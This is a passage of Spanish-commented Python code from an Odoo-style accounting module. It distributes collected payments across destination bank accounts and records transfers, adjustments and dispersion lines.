a transferir en caso que tengas efectivo disponible')\n importe=itematransferirefectivo.importe\n importeglobalefectivo=itemdispersion.importeoriginal-(itemdispersion.importeajustenegativo*-1)\n\n if importeglobalefectivo >= importe:\n cuentadestino=itematransferirefectivo.ctadestino_id\n reqtransferencia=False\n datoscomple=itematransferirefectivo.conceptocobro\n\n itemctadestino=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',efectivo_obj.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',datoscomple)])\n if not itemctadestino:\n self.crea_itemsdispersion(importe,efectivo_obj.id,efectivo_obj.id,importe,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,0,0,False,False)\n\n else:\n self.actualiza_itemsdispersion(itemctadestino,importe,importe,reqtransferencia,0,0)\n\n itemdispersion.importeoriginal=itemdispersion.importeoriginal-importe\n itemdispersion.importe=itemdispersion.importe-importe\n itematransferirefectivo.unlink()\n '''\n #tipos de valor diferente del efectivo\n '''\n _logger.warning('Inicio recorrido a transferir otros')\n for itematransferir in dispersion.atransferir_ids:\n if efectivo_obj.id!=itematransferir.tipovalor_id.id:\n _logger.warning('otros - reasignacion de registros a transferir en caso que tengas efectivo disponible')\n importe=itematransferir.importe\n importeglobalefectivo=itemdispersion.importeoriginal-(itemdispersion.importeajustenegativo*-1)\n\n if importeglobalefectivo >= importe:\n cuentadestino=itematransferir.ctadestino_id\n reqtransferencia=False\n datoscomple=itematransferir.conceptocobro\n\n itemctadestino=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',efectivo_obj.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',datoscomple)])\n if not itemctadestino:\n self.crea_itemsdispersion(importe,efectivo_obj.id,efectivo_obj.id,importe,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,0,0,False,False)\n\n else:\n self.actualiza_itemsdispersion(itemctadestino,importe,importe,reqtransferencia,0,0)\n \n itemdispersion.importeoriginal=itemdispersion.importeoriginal-importe\n itemdispersion.importe=itemdispersion.importe-importe\n itematransferir.unlink()\n '''\n \n _logger.warning('marca como a tranferir los detalles de la dispersion que no alcanzara importe del efectivo')\n for itematransferirreales in dispersion.atransferir_ids: \n itemsdispersiontransfiere=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',itematransferirreales.tipovalor_id.id),('destino_id','=',itematransferirreales.ctaorigen_id.id),('datoscomplementarios','=',itematransferirreales.concat)])\n for item in itemsdispersiontransfiere:\n item.reqtransferencia=True\n _logger.warning('marcando detalles de dispersion con a transferir')\n dispersion.write({'reqtransferencia': True})\n\n #SE GENEREAN LOS REGISTROS DE LAS CUENTAS DESTINO PARA EL OFICIO\n cuenta_obj=self.env['ctadestino.transferencia'].search([('dispersion_id','=',dispersion.id),('ctadestino_id','=',itematransferirreales.ctadestino_id.id)])\n if not cuenta_obj:\n cta_obj={}\n cta_obj={\n 'dispersion_id':dispersion.id,\n 'ctadestino_id':itematransferirreales.ctadestino_id.id,\n 'totalcta':itematransferirreales.importe\n }\n self.env['ctadestino.transferencia'].create(cta_obj)\n #print(itematransferirreales.ctadestino_id.name)\n else:\n _logger.warning('se encontro cuenta')\n total=cuenta_obj.totalcta+itematransferirreales.importe\n cuenta_obj.write({'totalcta': total})\n\n @api.multi\n def detalles_atransferirconceptoctadestino(self,cobro,dispersion,recepcion):\n _logger.warning('Requiere transferencia')\n conceptosctadestino=[]\n self.env.cr.execute('''\n select cobro.id idcobro,sum(item.price_unit-valdescto)importe,conceptocobro.ctadestino_id,conceptocobro.name,item.id,conceptocobro.id\n from cb_order cobro\n join cb_order_line item on cobro.id=item.order_id\n join product_template conceptocobro on item.product_id=conceptocobro.id\n join account_bank_statement_line st_line on cobro.id = st_line.cb_statement_id\n join account_journal diario on diario.id = st_line.journal_id\n where cobro.id=%s and item.price_unit>0 and coalesce(conceptocobro.check_ctadestino,'f')='t'\n and diario.type != 'cash' and cobro.state in ('paid','invoiced')\n group by cobro.id,conceptocobro.ctadestino_id,conceptocobro.name,item.id,conceptocobro.id\n '''%(cobro.id))\n cctadestino=self.env.cr.fetchall()\n for concepto in cctadestino:\n detallesconcepto={}\n detallesconcepto={\n 'importe':concepto[1],\n 'cuentadestino_id':concepto[2],\n 'concepto':'Cta. Destino Concepto de cobro: '+concepto[3],\n 'importecubierto':0,\n 'tipovalor_id':0,\n 'termino':False,\n 'idvalores':0,\n 'iditem':concepto[4],\n 'idcborder':concepto[0],\n 'conceptocobro_id':concepto[5],\n\n }\n conceptosctadestino.append(detallesconcepto)\n\n metodospagoctadestino=[]\n self.env.cr.execute('''\n select valores.id idvalores,valores.journal_id,sum(valores.amount)importe,coalesce(metodo.transfer_required,'f')\n from cb_order cobro\n join account_bank_statement_line valores on cobro.id=valores.cb_statement_id\n join account_journal metodo on valores.journal_id=metodo.id\n where cobro.id=%s and metodo.type != 'cash' and cobro.state in ('paid','invoiced')\n group by valores.id,valores.journal_id,coalesce(metodo.transfer_required,'f')\n order by coalesce(metodo.transfer_required,'f') desc\n '''%(cobro.id))\n metodospago=self.env.cr.fetchall()\n for tipovalor in metodospago:\n detallesmetodopago={}\n detallesmetodopago={\n 'idvalores':tipovalor[0],\n 'tipopago_id':tipovalor[1],\n 'importe':tipovalor[2],\n 'importetransferido':0,\n 'termino':False,\n 'transfiere':False,\n \n }\n metodospagoctadestino.append(detallesmetodopago)\n\n\n for metodopago in metodospagoctadestino:\n #print('aqui',metodopago['importe']-metodopago['importetransferido'])\n termino=False\n while (termino!=True):\n for ctadestino in conceptosctadestino:\n if not ctadestino['termino']:\n if metodopago['importetransferido']!=metodopago['importe']:\n importemetodo=metodopago['importe']-metodopago['importetransferido']\n importeconcepto=ctadestino['importe']-ctadestino['importecubierto']\n #print(importemetodo >= importeconcepto)\n #print(metodopago['importe'],metodopago['importetransferido'])\n #print(ctadestino['importe'],ctadestino['importecubierto'])\n if round(importemetodo, 2)>=round(importeconcepto, 2): \n _logger.warning('ajusto')\n ctadestino['tipovalor_id']=metodopago['tipopago_id']\n ctadestino['importecubierto']=importeconcepto\n ctadestino['idvalores']=metodopago['idvalores']\n ctadestino['termino']=True\n metodopago['importetransferido']=metodopago['importetransferido']+importeconcepto\n metodopago['transfiere']=True\n termino=True\n else:\n _logger.warning('no ajusto')\n\n ctadestino['tipovalor_id']=metodopago['tipopago_id']\n ctadestino['importe']=importemetodo\n ctadestino['importecubierto']=importemetodo\n ctadestino['termino']=True\n ctadestino['idvalores']=metodopago['idvalores']\n \n metodopago['importetransferido']=metodopago['importetransferido']+importemetodo\n metodopago['transfiere']=True\n\n importenuevoregistro=importeconcepto-importemetodo\n #raise ValidationError(importenuevoregistro)\n detallesconcepto={}\n detallesconcepto={\n 'importe':importenuevoregistro,\n 'cuentadestino_id':ctadestino['cuentadestino_id'],\n 'concepto':'Cta. Destino Concepto de cobro: '+ctadestino['concepto'],\n 'importecubierto':0,\n 'tipovalor_id':0,\n 'termino':False,\n 'idvalores':0,\n 'iditem':ctadestino['iditem'],\n 'idcborder':ctadestino['idcborder'],\n 'conceptocobro_id':ctadestino['conceptocobro_id'],\n\n }\n conceptosctadestino.append(detallesconcepto)\n termino=True\n else:\n termino=True\n\n for ctadestino in conceptosctadestino:\n ctadestino_obj=self.env['res.partner.bank'].search([('id','=',ctadestino['cuentadestino_id'])])\n metodospago=self.env['account.bank.statement.line'].search([('id','=',ctadestino['idvalores'])])\n \n if metodospago.journal_id.group_by_type:\n formapagodatoscomplementarios=''\n else:\n formapagodatoscomplementarios=metodospago.concat\n\n cuentaorigen=self.busca_ctadestino(metodospago,True)\n conceptocobro_obj=self.env['product.template'].search([('id','=',ctadestino['conceptocobro_id'])])\n conceptocobro='Cta. Destino Concepto de cobro: '+conceptocobro_obj.name\n\n if not ctadestino_obj:\n raise ValidationError ('''\n El Concepto de Cobro %s,\n No tiene configurada su cuenta destino.\n '''%(str(conceptocobro_obj.default_code)+' - '+str(conceptocobro_obj.name)))\n\n #REGISTRO DE PARA NOTA DE CREDITO EN CASO DE CACELAR RECIBO DARLE LA REVERSA A LO QUE SE TRANSFIRIO\n #reg_transfereciacobro={}\n #reg_transfereciacobro={\n # 'cborderline_id':ctadestino['iditem'],\n # 'dispersion_id':dispersion.id,\n # 'cborder_id':ctadestino['idcborder'],\n # 'tipovalor_id':ctadestino['tipovalor_id'],\n # 'ctaorigen_id':cuentaorigen.id,\n # 'ctadestino_id':ctadestino_obj.id,\n # 'importe':ctadestino['importe'],\n # 'concat':metodospago.concat,\n # 'active':True,\n # 'conceptocobro_id':conceptocobro_obj.id,\n #}\n #CAMBIO\n #self.env['cb.order.line.transferencia'].create(reg_transfereciacobro)\n #REGISTRO DE PARA NOTA DE CREDITO EN CASO DE CACELAR RECIBO DARLE LA REVERSA A LO QUE SE TRANSFIRIO\n\n if cuentaorigen:\n itematransferir=self.env['dispersionbancaria.transferir'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',metodospago.journal_id.id),('ctaorigen_id','=',cuentaorigen.id),('ctadestino_id','=',ctadestino_obj.id),('conceptocobro_id','=',conceptocobro_obj.id),('concat','=',formapagodatoscomplementarios),('conceptocobro','=',conceptocobro)])\n if cuentaorigen.id != ctadestino_obj.id:\n if not itematransferir:\n self.crea_atransferir(metodospago.journal_id,ctadestino['importe'],cuentaorigen,ctadestino_obj,dispersion.id,conceptocobro_obj.id,formapagodatoscomplementarios,conceptocobro)\n else:\n self.actualiza_atransferir(itematransferir,ctadestino['importe'])\n\n #cuenta_obj=self.env['ctadestino.transferencia'].search([('dispersion_id','=',dispersion.id),('ctadestino_id','=',ctadestino_obj.id)])\n #if not cuenta_obj:\n # cta_obj={}\n # cta_obj={\n # 'dispersion_id':dispersion.id,\n # 'ctadestino_id':ctadestino_obj.id,\n # 'totalcta':ctadestino['importe']\n # }\n # self.env['ctadestino.transferencia'].create(cta_obj)\n # print(ctadestino_obj.name)\n #else:\n # print('se encontro cuenta')\n # total=cuenta_obj.totalcta+ctadestino['importe']\n # cuenta_obj.write({'totalcta': total})\n\n for metodopago in metodospagoctadestino:\n metodospago=self.env['account.bank.statement.line'].search([('id','=',metodopago['idvalores'])])\n #Se valida que el metodo de pago no requiere transferencia ya que ese regisrto se tiene contemplado al final de los recorridos de lo contrario duplicaria informacion\n if metodospago.journal_id.transfer_required:\n cuentadestino=self.busca_ctadestino(metodospago,False)\n\n #CAMBIO\n #reqtransferencia=metodopago['transfiere']\n reqtransferencia=False\n\n if metodospago.journal_id.group_by_type:\n _logger.warning('agrupa')\n datoscomple=''\n else:\n _logger.warning('no agrupa')\n datoscomple=metodospago.concat\n\n itemajuste=self.env['cb.session.ajustes'].search([('session_id','=',recepcion.id),('metodo','=',metodospago.journal_id.id),('concat','=',metodospago.concat),('incluidodispersion','=',False)])\n \n importeori=metodopago['importe']\n importe=metodopago['importe']\n importeajustepositivo=0\n importeajustenegativo=0\n if itemajuste:\n if itemajuste.tipo_ajuste=='positivo':\n _logger.warning('Ajuste Positivo')\n importe=metodopago['importe']+itemajuste.importe\n importeajustepositivo=itemajuste.importe\n else:\n _logger.warning('Ajuste Negativo')\n importe=metodopago['importe']-itemajuste.importe\n importeajustenegativo=itemajuste.importe*-1\n self.crea_ajustes(itemajuste,dispersion.id)\n itemajuste.write({'incluidodispersion':True})\n\n #se busca en los detalles de la dispersion para agrupar por dato complementario\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',metodospago.journal_id.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',datoscomple)])\n\n if not itemdispersion:\n self.crea_itemsdispersion(importe,metodospago.journal_id.id,metodospago.journal_id.id,importeori,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,importeajustepositivo,importeajustenegativo,False,False)\n\n else:\n self.actualiza_itemsdispersion(itemdispersion,importeori,importe,reqtransferencia,importeajustepositivo,importeajustenegativo)\n\n @api.multi\n def detalles_dispersionconceptoctadestino(self,cobro,dispersion,recepcion,efectivo_obj):\n _logger.warning('No requiere transferencia')\n reqtransferencia=False\n conceptosctadestino=[]\n self.env.cr.execute('''\n select cobro.id idcobro,sum(item.price_unit-valdescto)importe,conceptocobro.ctadestino_id,conceptocobro.name,item.id\n from cb_order cobro\n join cb_order_line item on cobro.id=item.order_id\n join product_template conceptocobro on item.product_id=conceptocobro.id\n join account_bank_statement_line st_line on cobro.id = st_line.cb_statement_id\n join account_journal diario on diario.id = st_line.journal_id\n where cobro.id=%s and item.price_unit>0 and coalesce(conceptocobro.check_ctadestino,'f')='t'\n and diario.type != 'cash' and cobro.state in ('paid','invoiced')\n group by cobro.id,conceptocobro.ctadestino_id,conceptocobro.name,item.id\n '''%(cobro.id))\n cctadestino=self.env.cr.fetchall()\n for concepto in cctadestino:\n detallesconcepto={}\n detallesconcepto={\n 'importe':concepto[1],\n 'cuentadestino_id':concepto[2],\n 'concepto':'Cta. Destino Concepto de cobro: '+concepto[3],\n 'importecubierto':0,\n 'tipovalor_id':efectivo_obj.id,\n 'termino':False,\n 'iditem':concepto[4],\n 'idcborder':concepto[0],\n 'idvalores':0,\n 'concat':'',\n\n }\n conceptosctadestino.append(detallesconcepto)\n\n\n for ctadestino in conceptosctadestino:\n _logger.warning('cuenta destino concepto')\n #print (ctadestino['termino'])\n #print(ctadestino['importe'])\n #ctadestino['importe']=ctadestino['importe']*10\n #print(ctadestino['concepto'])\n\n ctadestino_obj=self.env['res.partner.bank'].search([('id','=',ctadestino['cuentadestino_id'])])\n tipovalor_obj=self.env['account.journal'].search([('id','=',ctadestino['tipovalor_id'])])\n metodospago=self.env['account.bank.statement.line'].search([('id','=',ctadestino['idvalores'])])\n cuentaorigen=efectivo_obj.destination_account_id\n #if not cuentaorigen:\n # raise ValidationError('No se encontro la cuenta origen del metodo de pago '+str(cuentaorigen.name))\n importeori=ctadestino['importe']\n importe=ctadestino['importe']\n\n\n #REGISTRO DE PARA NOTA DE CREDITO EN CASO DE CACELAR RECIBO DARLE LA REVERSA A LO QUE SE TRANSFIRIO\n #reg_transfereciacobro={}\n #reg_transfereciacobro={\n # 'cborderline_id':ctadestino['iditem'],\n # 'dispersion_id':dispersion.id,\n # 'cborder_id':ctadestino['idcborder'],\n # 'tipovalor_id':ctadestino['tipovalor_id'],\n # 'ctaorigen_id':cuentaorigen.id,\n # 'ctadestino_id':ctadestino_obj.id,\n # 'importe':ctadestino['importe'],\n # 'concat':'S/D',\n # 'active':True,\n #}\n #CAMBIO\n #self.env['cb.order.line.transferencia'].create(reg_transfereciacobro)\n #REGISTRO DE PARA NOTA DE CREDITO EN CASO DE CACELAR RECIBO DARLE LA REVERSA A LO QUE SE TRANSFIRIO\n\n\n #se busca en los detalles de la dispersion para agrupar por dato complementario\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',tipovalor_obj.id),('destino_id','=',ctadestino_obj.id),('datoscomplementarios','=',ctadestino['concepto'])])\n\n if not itemdispersion:\n self.crea_itemsdispersion(importe,tipovalor_obj.id,tipovalor_obj.id,importeori,importe,ctadestino_obj.id,ctadestino_obj.bank_id.id,reqtransferencia,dispersion.id,ctadestino['concepto'],0,0,True,False)\n else:\n self.actualiza_itemsdispersion(itemdispersion,importeori,importe,reqtransferencia,0,0)\n\n if ctadestino['concat']=='S/D': \n datoscomple=False \n else: \n datoscomple=True \n \n importeutilizado=0 \n itemresumenpago=self.env['account.bank.statement'].search([('cb_session_id','=',recepcion.id),('journal_id','=',tipovalor_obj.id)]) \n if datoscomple: \n metodo=itemresumenpago.env['account.statement.group.line'].search([('concat','=',ctadestino['concat']),('statement_id','=',itemresumenpago.id)]) \n else: \n metodo=itemresumenpago.env['account.statement.group.line'].search([('statement_id','=',itemresumenpago.id)]) \n #raise ValidationError(metodo) \n importeutilizado=importe+metodo.utilizado \n metodo.write({'utilizado':importeutilizado})\n\n\n metodospagoctadestino=[]\n self.env.cr.execute('''\n select valores.id idvalores,valores.journal_id,sum(valores.amount)importe,coalesce(metodo.transfer_required,'f')transferencia,coalesce(valores.concat,'S/D')\n from cb_order cobro\n join account_bank_statement_line valores on cobro.id=valores.cb_statement_id\n join account_journal metodo on valores.journal_id=metodo.id\n where cobro.id=%s and coalesce(metodo.transfer_required,'f')='t'\n and metodo.type != 'cash' and cobro.state in ('paid', 'invoiced')\n group by valores.id,valores.journal_id,coalesce(metodo.transfer_required,'f'),coalesce(valores.concat,'S/D')\n '''%(cobro.id))\n metodospago=self.env.cr.fetchall()\n for tipovalor in metodospago:\n detallesmetodopago={}\n detallesmetodopago={\n 'idvalores':tipovalor[0],\n 'tipopago_id':tipovalor[1],\n 'importe':tipovalor[2],\n 'importetransferido':0,\n 'termino':False,\n 'reqtransferencia':tipovalor[3],\n 'concat':tipovalor[4],\n \n }\n metodospagoctadestino.append(detallesmetodopago)\n\n for metodopago in metodospagoctadestino:\n metodospago=self.env['account.bank.statement.line'].search([('id','=',metodopago['idvalores'])])\n cuentadestino=self.busca_ctadestino(metodospago,False)\n\n if metodospago.journal_id.group_by_type:\n _logger.warning('agrupa')\n datoscomple=''\n else:\n _logger.warning('no agrupa')\n datoscomple=metodospago.concat\n\n itemajuste=self.env['cb.session.ajustes'].search([('session_id','=',recepcion.id),('metodo','=',metodospago.journal_id.id),('concat','=',metodospago.concat),('incluidodispersion','=',False)]) \n \n importeori=metodopago['importe'] \n importe=metodopago['importe'] \n importeajustepositivo=0\n importeajustenegativo=0\n\n if itemajuste: \n if itemajuste.tipo_ajuste=='positivo': \n _logger.warning('Ajuste Positivo') \n importe=metodopago['importe']+itemajuste.importe\n importeajustepositivo=itemajuste.importe \n else: \n _logger.warning('Ajuste Negativo') \n importe=metodopago['importe']-itemajuste.importe\n importeajustenegativo=itemajuste.importe*-1 \n self.crea_ajustes(itemajuste,dispersion.id) \n itemajuste.write({'incluidodispersion':True})\n\n #se busca en los detalles de la dispersion para agrupar por dato complementario\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',metodospago.journal_id.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',datoscomple)])\n\n if not itemdispersion:\n self.crea_itemsdispersion(importe,metodospago.journal_id.id,metodospago.journal_id.id,importeori,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,importeajustepositivo,importeajustenegativo,False,False)\n\n else:\n self.actualiza_itemsdispersion(itemdispersion,importeori,importe,reqtransferencia,importeajustepositivo,importeajustenegativo)\n\n @api.multi\n def valida_cobroctadestino(self,cobro):\n _logger.warning('Inicio valida cobro cta destino')\n _logger.warning(cobro.pos_reference)\n #Se hace una consulta buscando conceptos de cta destino \n self.env.cr.execute('''\n select count(cobro.id)\n from cb_order cobro\n join cb_order_line item on cobro.id=item.order_id\n join product_template conceptocobro on item.product_id=conceptocobro.id\n join account_bank_statement_line st_line on cobro.id = st_line.cb_statement_id\n join account_journal diario on diario.id = st_line.journal_id\n where cobro.id=%s and item.price_unit>0 and coalesce(conceptocobro.check_ctadestino,'f')='t' and (cobro.state='paid' or cobro.state='invoiced')\n and diario.type != 'cash'\n '''%(cobro.id))\n cobroctadestino=self.env.cr.fetchall()[0][0]\n\n if cobroctadestino!=0:\n return True\n else:\n return False\n _logger.warning('Fin valida cobro cta destino')\n\n @api.multi\n def importe_cobroctadestino(self,cobro):\n _logger.warning('Inicio busqueda importe cta destino')\n _logger.warning(cobro.pos_reference)\n #Se hace una consulta buscando el importe de conceptos de cta destino \n self.env.cr.execute('''\n select cobro.id idcobro,sum(item.price_unit-coalesce(item.valdescto,0))importe\n from cb_order cobro\n join cb_order_line item on cobro.id=item.order_id\n join product_template conceptocobro on item.product_id=conceptocobro.id\n join account_bank_statement_line st_line on cobro.id = st_line.cb_statement_id\n join account_journal diario on diario.id = st_line.journal_id\n where cobro.id=%s and item.price_unit>0 and coalesce(conceptocobro.check_ctadestino,'f')='t'\n and (cobro.state='paid' or cobro.state='invoiced') and diario.type != 'cash'\n group by cobro.id\n '''%(cobro.id))\n importectadestino=self.env.cr.fetchall()\n impctadestino=0\n for i in importectadestino:\n impctadestino=i[1]\n return impctadestino \n _logger.warning('Fin busqueda importe cta destino')\n\n @api.multi\n def importe_noreqtransferencia(self,cobro,recepcion,importectadestino,importereal):\n _logger.warning('Inicio Busca metodo pago que no requiera transferencia')\n _logger.warning(cobro.pos_reference)\n #Se hace una consulta buscando conceptos de cta destino \n #self.env.cr.execute('''\n # select cobro.id idcobro,sum(valores.amount)importe\n # from cb_order cobro\n # join account_bank_statement_line valores on cobro.id=valores.cb_statement_id\n # join account_journal metodo on valores.journal_id=metodo.id\n # where cobro.id=%s and coalesce(metodo.transfer_required,'f')='f' and (coalesce(metodo.virtual,'f')='f' and coalesce(metodo.select_account,'f')='f')\n # group by cobro.id\n # '''%(cobro.id))\n \n\n self.env.cr.execute('''\n select cobro.id idcobro,valores.id,valores.journal_id,coalesce(valores.concat,'S/D'),sum(valores.amount)importe\n from cb_order cobro\n join account_bank_statement_line valores on cobro.id=valores.cb_statement_id\n join account_journal metodo on valores.journal_id=metodo.id\n where cobro.id=%s and coalesce(metodo.transfer_required,'f')='f'\n and (coalesce(metodo.virtual,'f')='f' and coalesce(metodo.select_account,'f')='f')\n group by cobro.id,valores.id,valores.journal_id,coalesce(valores.concat,'S/D')\n '''%(cobro.id))\n importemetodo=self.env.cr.fetchall()\n impmetodopago=0\n importe=0\n aplica=False\n for imp in importemetodo:\n importe=importe+imp[4]\n\n #Valido que el cobro tenga importe de un metodo de pago que no requiera trnaferencia\n if importe==0:\n aplica=False\n #Valido que el importe de que no requiere transferencia alcance para el monto de los conceptos de cuenta de destino\n elif importe>=importectadestino:\n #Valido que el importe del efectivo global alcance para cubir el monto de los conceptos de cuenta de destino\n if importereal>=importectadestino:\n aplica=True\n else:\n aplica=False\n else:\n aplica=False\n\n return aplica\n\n #raise ValidationError(importereal)\n\n # if imp[3]=='S/D':\n # datoscomple=False \n # else: \n # datoscomple=True\n # itemresumenpago=self.env['account.bank.statement'].search([('cb_session_id','=',recepcion.id),('journal_id','=',imp[2])])\n # if datoscomple:\n # metodo=itemresumenpago.env['account.statement.group.line'].search([('concat','=',imp[3]),('statement_id','=',itemresumenpago.id)])\n # else:\n # metodo=itemresumenpago.env['account.statement.group.line'].search([('statement_id','=',itemresumenpago.id)])\n # #raise ValidationError(metodo)\n # impmetodopago=impmetodopago+(metodo.amount_real-metodo.utilizado)\n #if importe >= importectadestino:\n #if impmetodopago >= importectadestino:\n # return True\n #else:\n # return False\n #else:\n #return False\n _logger.warning('Fin Busca metodo pago que no requiera transferencia')\n\n @api.multi\n def crea_atransferir(self,tipovalor_obj,importe,ctaorigen,ctadestino,dispersion_id,conceptocobro_id,concat,conceptocobro):\n detallesatransferir={}\n detallesatransferir={\n 'tipovalor_id':tipovalor_obj.id,\n 'importe':importe,\n 'ctaorigen_id':ctaorigen.id,\n 'ctadestino_id':ctadestino.id,\n 'dispersion_id':dispersion_id,\n 'conceptocobro_id':conceptocobro_id,\n 'concat':concat,\n 'conceptocobro':conceptocobro,\n\n }\n _logger.warning(':::::::::::::::::::::::::'+str(importe))\n itematransferir = self.env['dispersionbancaria.transferir'].with_context(check_move_validity=False).create(detallesatransferir)\n _logger.warning(':::::::::::::'+str(itematransferir.id))\n _logger.warning(':::::::::::::::::::::::::'+str(itematransferir.importe))\n\n @api.multi\n def actualiza_atransferir(self,itematransferir,importe):\n imp=itematransferir.importe+importe\n _logger.warning(':::::::::::::::::::::::::'+str(importe))\n _logger.warning(':::::::::::::::::::::::::'+str(itematransferir.importe))\n itematransferir.write({'importe':imp})\n _logger.warning(':::::::::::::::::::::::::'+str(itematransferir.importe))\n\n\n @api.multi\n def busca_ctadestino(self,metodospago,doble):\n _logger.warning('||||||||||||||||||||||||||||||')\n _logger.warning('Inicio Busca cta bancaria')\n #raise ValidationError(metodospago.journal_id.search_by_bank and (not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_bank_account and not metodospago.journal_id.select_account))\n #and (not metodospago.journal_id.search_by_bank and not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_bank_account and not metodospago.journal_id.select_account and not metodospago.journal_id.virtual)\n #Cheque\n #cuentadestino=''\n if metodospago.journal_id.search_by_bank and (not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_bank_account and not metodospago.journal_id.select_account and not metodospago.journal_id.virtual):\n _logger.warning('requiere banco')\n cuentadestino=self.env['res.partner.bank'].search([('bank_id','=',metodospago.bank.id),('dispersion_check','=',True)],limit=1)\n if not cuentadestino:\n _logger.warning('No acepta cheque')\n cuentadestino=metodospago.journal_id.destination_account_id\n else:\n _logger.warning('Acepta cheque')\n \n #Tarjeta\n elif metodospago.journal_id.terminal_use and metodospago.journal_id.select_bank_account and (not metodospago.journal_id.search_by_bank and not metodospago.journal_id.select_account and not metodospago.journal_id.virtual):\n _logger.warning('Cta.Bancaria Y Terminal')\n cuentadestino=metodospago.account_bank\n if not cuentadestino:\n _logger.warning('Terminal')\n cuentadestino=metodospago.terminal.destination_account\n else:\n _logger.warning('Cta Bancaria')\n\n #Transferencia,Fichas de Depositos,Otros\n elif metodospago.journal_id.select_bank_account and (not metodospago.journal_id.search_by_bank and not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_account and not metodospago.journal_id.virtual):\n _logger.warning('Cta Bancaria')\n cuentadestino=metodospago.account_bank\n\n #Reconocimiento de derechos\n elif metodospago.journal_id.select_account and metodospago.journal_id.virtual and (not metodospago.journal_id.search_by_bank and not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_bank_account):\n _logger.warning('Virtual')\n if metodospago.journal_id.destination_account_id.virtual_account:\n _logger.warning('Cuenta virtual')\n if doble:\n if metodospago.journal_id.destination_account_id.double_transfer:\n cuentadestino=metodospago.journal_id.destination_account_id.double_transfer_account_id\n else:\n raise ValidationError('No se encontro habilitada la opción de transferencia doble dentro de la configuración de la cuenta virtual ')\n else:\n cuentadestino=metodospago.journal_id.destination_account_id\n else:\n raise ValidationError('No se encontro la cuenta virtual,Revisar configuración de cuentas bancarias')\n cuentadestino=self.env['res.partner.bank'].search([('id','=',0)],limit=1)\n _logger.warning('Sin cuenta virtual')\n\n #Efectivo y Terceros\n elif not metodospago.journal_id.search_by_bank and not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_bank_account and not metodospago.journal_id.select_account and not metodospago.journal_id.virtual:\n _logger.warning('Cta destino efectivo')\n cuentadestino=metodospago.journal_id.destination_account_id\n\n else:\n raise ValidationError(_('No esta configurado correctamente el metodo de pago %s') % metodospago.journal_id.name)\n _logger.warning('||||||||||||||||||||||||||||||')\n\n if cuentadestino.id:\n return cuentadestino\n #else:\n # \n # raise ValidationError(_('No se encontro la cuenta destino de %s, favor de revisar la configuración del metodo de pago') % metodospago.journal_id.name)\n _logger.warning('Fin Busca cta bancaria')\n\n @api.multi\n def crea_ajustes(self,ajuste,dispersion_id):\n detallesajuste={}\n importe=0\n if ajuste.tipo_ajuste=='positivo':\n importe=ajuste.importe\n else:\n importe=ajuste.importe*-1\n #if metodospago_amount > 0:\n detallesajuste={\n 'tipo_ajuste':ajuste.tipo_ajuste,\n 'tipovalor_id':ajuste.metodo.id,\n 'importe':importe,\n 'concat':ajuste.concat,\n 'dispersion_id':dispersion_id,\n\n }\n #diccionario.append(detallesdispersion)\n self.env['dispersionbancaria.ajustes'].with_context(check_move_validity=False).create(detallesajuste)\n _logger.warning('se creo detalle de ajustes')\n #else:\n # print('no se creo detalle de dispersion')\n\n #for p in diccionario:\n # print(p)\n # print(p.get('tipovalor_id'))\n #raise ValidationError(diccionario)\n\n @api.multi\n def crea_itemsdispersion(self,metodospago_amount,valor_id,tipovalor_id,importeoriginal,importe,destino_id,banco_id,reqtransferencia,dispersion_id,datoscomplementarios,importeajustepositivo,importeajustenegativo,transferido,efectivoglobal):\n detallesdispersion={}\n #if metodospago_amount > 0:\n detallesdispersion={\n 'valor_id':valor_id,\n 'tipovalor_id':tipovalor_id,\n 'importeoriginal':importeoriginal,\n 'importe':importe,\n 'destino_id':destino_id,\n 'banco_id':banco_id,\n 'reqtransferencia':reqtransferencia,\n 'dispersion_id':dispersion_id,\n 'datoscomplementarios':datoscomplementarios,\n 'importeajustepositivo':importeajustepositivo,\n 'importeajustenegativo':importeajustenegativo,\n 'transferido':transferido,\n 'efectivoglobal':efectivoglobal,\n\n }\n #diccionario.append(detallesdispersion)\n self.env['dispersionbancaria.line'].with_context(check_move_validity=False).create(detallesdispersion)\n _logger.warning('se creo detalle de dispersion')\n #else:\n # print('no se creo detalle de dispersion')\n\n #for p in diccionario:\n # print(p)\n # print(p.get('tipovalor_id'))\n #raise ValidationError(diccionario)\n\n @api.multi\n def actualiza_itemsdispersion(self,itemdispersion,importeori,importe,reqtransferencia,importeajustepositivo,importeajustenegativo):\n impo=itemdispersion.importeoriginal+importeori\n imp=itemdispersion.importe+importe\n imppositivo=itemdispersion.importeajustepositivo+importeajustepositivo\n impnegativo=itemdispersion.importeajustenegativo+importeajustenegativo\n\n if itemdispersion.reqtransferencia:\n reqtransferencia=True\n\n itemdispersion.write({'importeoriginal': impo,'importe':imp,'reqtransferencia':reqtransferencia,'importeajustepositivo':imppositivo,'importeajustenegativo':impnegativo})\n\n\n @api.multi\n def importe_general_efectivo(self,fecha,agrupacioncaja):\n self.env.cr.execute('''\n select cast(recepcion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS 